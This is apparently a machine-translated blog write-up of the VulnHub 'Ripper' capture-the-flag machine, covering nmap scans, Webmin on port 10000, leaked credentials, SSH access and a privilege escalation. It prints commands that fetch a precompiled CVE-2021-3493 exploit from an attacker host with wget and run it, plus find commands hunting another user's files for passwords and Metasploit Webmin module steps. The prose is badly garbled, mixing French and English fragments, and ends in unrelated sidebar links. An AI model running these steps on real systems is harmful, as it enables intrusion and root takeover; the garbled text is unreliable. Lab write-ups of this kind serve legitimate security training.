当前位置:网站首页>Ripper of vulnhub
Ripper of vulnhub
2022-07-03 11:47:00 【May... Fleurs Vii.】
Table des matières
2.、Sonde de version de service
Quatre、Fuite d'information du système interne
1.Télécharger l'exécution de la compilation
Sept、 Droit de revendication normal
2. TrouvercubesDocuments connexes
Un.、nmapScan Survival Host
1.Scan semi - ouvert
nmap -sS ip
2.Balayage ouvert complet
nmap -sT ip
3.Basé surpingScan de
nmap -sP ip
4.Basé surarpScan de
nmap -PR ip
5.AucunepingScan
nmap -PN 192.168.152.130
2.、Sonde de version de service
22,80 Ou deux services communs ,10000Le port est ouvert.webmin
Webmin Est la base la plus puissante WebDeUnixOutils de gestion du système. Accès de l'Administrateur via le Navigateur Webmin Diverses fonctions de gestion et mesures de gestion correspondantes .WebminSoutenir la grande majorité desUnixSystème, Ces systèmes, à l'exception de toutes les versions linuxEn plus de:AIX、HPUX、Solaris、Unixware、IrixEtFreeBSDAttendez..

Trois、Collecte d'informations
80 Le port n'a aucune information utile pour franchir la frontière.
Mais dans10000 On en a trouvé un. webminBoîte de connexion pour
1.webminBoîte de connexion pour
2.robots.txtDocumentation

3.Essayer de déchiffrer
we scan php codes with rips

4.rips
RIPS Est un bon outil d'analyse de code source statique , Utilisé principalement pour creuser PHP Vulnérabilité du programme . Et c'est un webInterface,Accès àripsCommencez à utiliser. Essayer d'accéder .
En fin de compte,80 On a vu ça sous le port. rips

Quatre、Fuite d'information du système interne

Cinq、sshConnexion
Essayez de vous connecter ici webmin Pas en coulisses. .Essayer d'utilisersshConnexion réussie,

Six、0dayDroit de rétractation
Parce qu'après le lancement de cette cible, ,unbuntu Il y a une faille dans les droits. .Pour que nous puissions utiliser directement.
Numéro de vulnérabilité:cve-2021-3493

1.Télécharger l'exécution de la compilation
L'hôte cible n'a pas d'environnement de compilation ,Précompilé
gcc exploit.c -o exp
OuverthttpServices
python3 -m http.server 80
Télécharger
wget http://192.168.0.106/exp
Droit de donner
chmod 777 exp
Mise en œuvre
./exp

Sept、 Droit de revendication normal
1. firefox
J'ai vu un autre navigateur Firefox. , Ça ne sert à rien. .

2. TrouvercubesDocuments connexes
find / -user cubes -type f -exec ls -al {} \; 2>/dev/null
Cet ordre{} Est utilisé pour recevoir les résultats
C'est pour s'échapper. ;De
Après une recherche, J'ai un code. ,Je suppose quecubesDe
3.suOui.cubes

4.findRecherche
Recherche etcubesQuestions connexes, Et filtrer ce qui est inutile
find / -user cubes -type f -exec ls -al {} \; 2>/dev/null |grep -v "proc"
Nous l'avons trouvé dans le fichier journal adminNuméro de compte, mot de passe

5.ConnexionwebminBackground
Parce qu'on a le numéro de compte de l'Administrateur. ,Encore parce quewebminC'est le contrôle.linuxTerminalweb‘Application’, Donc vous avez les permissions les plus élevées depuis que vous vous êtes connecté .

Huit、msf
Je suis juste venu me familiariser avec l'utilisation. ,Parce quemsfDerce Le module nécessite également un mot de passe de compte , Mais avec le compte et le mot de passe, nous pouvons obtenir l'autorisation de l'Administrateur directement.
msfconsole
search webmin
use 2
show options
Définir les paramètres
C'est là que ça doit être réglé.
set ssl true

边栏推荐
- Sheet1$.输出[Excel 源输出].列[XXX] 出错。返回的列状态是:“文本被截断,或者一个或多个字符在目标代码页中没有匹配项。”。
- Visual Studio 2022下载及配置OpenCV4.5.5
- repo ~ 常用命令
- Capturing and sorting out external Fiddler -- Conversation bar and filter [2]
- ORACLE进阶(一) 通过EXPDP IMPDP命令实现导dmp
- 利用Zabbix动态监控磁盘I/O
- 并发编程-单例
- This article explains the complex relationship between MCU, arm, MCU, DSP, FPGA and embedded system
- 《剑指offer 03》数组中重复的数字
- Excel表格转到Word中,表格不超边缘纸张范围
猜你喜欢

金额计算用 BigDecimal 就万无一失了?看看这五个坑吧~~

PHP Basics

Multi dimensional monitoring: the data base of intelligent monitoring

Excel quick cross table copy and paste

vulnhub之GeminiInc v2
![抓包整理外篇fiddler———— 会话栏与过滤器[二]](/img/04/e9cc027d753e7049f273d866eefdce.png)
抓包整理外篇fiddler———— 会话栏与过滤器[二]

Kubernetes 三打探针及探针方式

Use typora to draw flow chart, sequence diagram, sequence diagram, Gantt chart, etc. for detailed explanation

Mmc5603nj geomagnetic sensor (Compass example)

Hongmeng fourth training
随机推荐
抓包整理外篇fiddler———— 会话栏与过滤器[二]
VS2015的下载地址和安装教程
Analysis of EPS electric steering system
POI excel cell wrap
Cadence background color setting
How to make others fear you
P3250 [HNOI2016] 网络 + [NECPC2022] F.Tree Path 树剖+线段树维护堆
Extrapolated scatter data
《剑指offer 04》二维数组查找
STL教程9-容器元素深拷贝和浅拷贝问题
PHP基础
Double linked list of linear list
Cuiyusong, CTO of youzan: the core goal of Jarvis is to make products smarter and more reliable
How to mix embedded MCU, arm and DSP?
vulnhub之raven2
动态规划(区间dp)
外插散点数据
R language uses the aggregate function to calculate the mean value (sum) of dataframe data grouping aggregation without setting na The result of RM calculation. If the group contains the missing value
The LINQ expression node type 'ArrayIndex' is not supported in LINQ to Entities
The excel table is transferred to word, and the table does not exceed the edge paper range